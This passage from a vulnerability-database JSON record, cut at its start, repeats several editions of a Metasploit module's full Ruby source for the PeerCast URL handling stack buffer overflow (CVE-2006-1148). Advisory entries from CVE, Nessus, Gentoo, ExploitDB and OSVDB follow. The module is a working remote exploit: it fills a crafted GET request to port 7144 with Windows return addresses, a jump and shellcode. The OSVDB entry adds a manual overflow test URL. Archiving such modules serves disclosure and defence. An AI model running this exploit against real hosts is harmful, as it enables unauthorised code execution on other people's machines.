'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "lastseen": "2018-01-14T22:10:23", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {"score": {"value": null, "modified": "2018-01-14T22:10:23"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb"}, "differentElements": ["modified", "published"], "edition": 10, "lastseen": "2018-01-14T22:10:23"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "viewCount": 1, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "title": "PeerCast URL Handling Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "bulletinFamily": "exploit", "published": "2006-03-30T21:05:42", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "metasploitReliability": "Average", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "lastseen": "2018-01-15T14:15:19", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {"score": {"value": null, "modified": "2018-01-15T14:15:19"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb"}, "differentElements": ["modified", "published"], "edition": 11, "lastseen": "2018-01-15T14:15:19"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "viewCount": 1, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "title": "PeerCast URL Handling Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "metasploitReliability": "Average", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "lastseen": "2018-01-16T10:14:26", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {"score": {"value": null, "modified": "2018-01-16T10:14:26"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb"}, "differentElements": ["modified", "published"], "edition": 12, "lastseen": "2018-01-16T10:14:26"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "viewCount": 1, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "title": "PeerCast URL Handling Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "bulletinFamily": "exploit", "published": "2006-03-30T21:05:42", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "metasploitReliability": "Average", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "lastseen": "2018-01-17T00:12:08", "history": [], "modified": "2017-07-24T13:26:21", "enchantments": {"score": {"value": 7.2, "modified": "2018-01-17T00:12:08"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb"}, "differentElements": ["modified", "published"], "edition": 13, "lastseen": "2018-01-17T00:12:08"}, {"bulletin": {"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "viewCount": 1, "id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "title": "PeerCast URL Handling Buffer Overflow", "references": [], "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "bulletinFamily": "exploit", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "metasploitReliability": "Average", "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "lastseen": "2018-02-22T01:07:08", "history": [], "modified": "1976-01-01T00:00:00", "enchantments": {"score": {"value": 7.2, "modified": "2018-02-22T01:07:08"}}, "href": "", "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb"}, "differentElements": ["modified", "published"], "edition": 14, "lastseen": "2018-02-22T01:07:08"}], "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "type": "metasploit", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "title": "PeerCast URL Handling Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "objectVersion": "1.4", "cvelist": ["CVE-2006-1148"], "published": "2006-03-30T21:05:42", "references": [], "reporter": "Rapid7", "_object_type": "robots.models.metasploit.MetasploitBulletin", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "modified": "2017-07-24T13:26:21", "href": ""}
{"result": {"cve": [{"id": "CVE-2006-1148", "type": "cve", "title": "CVE-2006-1148", "description": "Multiple stack-based buffer overflows in the procConnectArgs function in servmgr.cpp in PeerCast before 0.1217 allow remote attackers to execute arbitrary code via an HTTP GET request with a long (1) parameter name or (2) value in a URL, which triggers the overflow in the nextCGIarg function in servhs.cpp.", "published": "2006-03-10T06:02:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1148", "cvelist": ["CVE-2006-1148"], "lastseen": "2017-07-20T10:49:09"}], "metasploit": [{"id": "MSF:EXPLOIT/LINUX/HTTP/PEERCAST_URL", "type": "metasploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2006-1148"], "lastseen": "2018-02-25T03:05:37"}], "openvas": [{"id": "OPENVAS:56545", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200603-17 (peercast)", "description": "The remote host is missing updates announced in\nadvisory GLSA 200603-17.", "published": "2008-09-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=56545", "cvelist": ["CVE-2006-1148"], "lastseen": "2017-07-24T12:50:17"}], "nessus": [{"id": "PEERCAST_01217.NASL", "type": "nessus", "title": "PeerCast procConnectArgs() Function URL Handling Remote Overflow", "description": "The version of PeerCast installed on the remote host copies the supplied option string without limit into a finite-size buffer. An unauthenticated attacker can leverage this issue to crash the affected application and possibly to execute arbitrary code on the remote host subject to the privileges of the user running PeerCast.", "published": "2006-03-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=21041", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-11-24T09:26:09"}, {"id": "GENTOO_GLSA-200603-17.NASL", "type": "nessus", "title": "GLSA-200603-17 : PeerCast: Buffer overflow", "description": "The remote host is affected by the vulnerability described in GLSA-200603-17 (PeerCast: Buffer overflow)\n\n INFIGO discovered a problem in the URL handling code. Buffers that are allocated on the stack can be overflowed inside of nextCGIarg() function.\n Impact :\n\n By sending a specially crafted request to the HTTP server, a remote attacker can cause a stack overflow, resulting in the execution of arbitrary code.\n Workaround :\n\n There is no known workaround at this time.", "published": "2006-03-23T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=21124", "cvelist": ["CVE-2006-1148"], "lastseen": "2017-10-29T13:35:50"}], "gentoo": [{"id": "GLSA-200603-17", "type": "gentoo", "title": "PeerCast: Buffer overflow", "description": "### Background\n\nPeerCast is a Peer to Peer broadcasting technology for listening to radio and watching video on the Internet. \n\n### Description\n\nINFIGO discovered a problem in the URL handling code. Buffers that are allocated on the stack can be overflowed inside of nextCGIarg() function. \n\n### Impact\n\nBy sending a specially crafted request to the HTTP server, a remote attacker can cause a stack overflow, resulting in the execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll PeerCast users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-sound/peercast-0.1217\"", "published": "2006-03-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://security.gentoo.org/glsa/200603-17", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-09-06T19:46:33"}], "packetstorm": [{"id": "PACKETSTORM:82238", "type": "packetstorm", "title": "PeerCast 0.1216 Buffer Overflow", "description": "", "published": "2009-10-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/82238/PeerCast-0.1216-Buffer-Overflow.html", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-12-05T22:12:48"}], "exploitdb": [{"id": "EDB-ID:16855", "type": "exploitdb", "title": "PeerCast <= 0.1216 URL Handling Buffer Overflow linux", "description": "PeerCast. CVE-2006-1148. Remote exploit for linux platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16855/", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-02-02T06:40:34"}, {"id": "EDB-ID:16786", "type": "exploitdb", "title": "PeerCast <= 0.1216 URL Handling Buffer Overflow Win32", "description": "PeerCast. CVE-2006-1148. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16786/", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-02-02T06:30:19"}, {"id": "EDB-ID:10027", "type": "exploitdb", "title": "PeerCast <= 0.1216", "description": "PeerCast. CVE-2006-1148. Remote exploit for linux platform", "published": "2006-03-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/10027/", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-02-01T11:45:48"}], "osvdb": [{"id": "OSVDB:23777", "type": "osvdb", "title": "PeerCast procConnectArgs() Function URL Handling Remote Overflow", "description": "## Vulnerability Description\nA remote overflow exists in PeerCast. The procConnectArgs() function fails to perform correct boundary checks on parameters passed in a URL, resulting in a stack-based overflow. With a specially crafted URL, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 0.1217 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in PeerCast. The procConnectArgs() function fails to perform correct boundary checks on parameters passed in a URL, resulting in a stack-based overflow. With a specially crafted URL, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Manual Testing Notes\nhttp://[target]:7144/stream/?AAAAAAAAAAAAAAAAAAAAAAA....(800)\n## References:\nVendor URL: http://www.peercast.org/\n[Secunia Advisory ID:19169](https://secuniaresearch.flexerasoftware.com/advisories/19169/)\n[Secunia Advisory ID:19291](https://secuniaresearch.flexerasoftware.com/advisories/19291/)\nOther Advisory URL: http://www.peercast.org/forum/viewtopic.php?t=3346\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200603-17.xml\nOther Advisory URL: http://www.infigo.hr/in_focus/INFIGO-2006-03-01\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0977.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0722.html\nGeneric Exploit URL: http://prdelka.blackart.org.uk/exploitz/prdelka-vs-GNU-peercast.c\n[CVE-2006-1148](https://vulners.com/cve/CVE-2006-1148)\nBugtraq ID: 17040\n", "published": "2006-03-09T06:02:41", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:23777", "cvelist": ["CVE-2006-1148"], "lastseen": "2017-04-28T13:20:20"}]}}
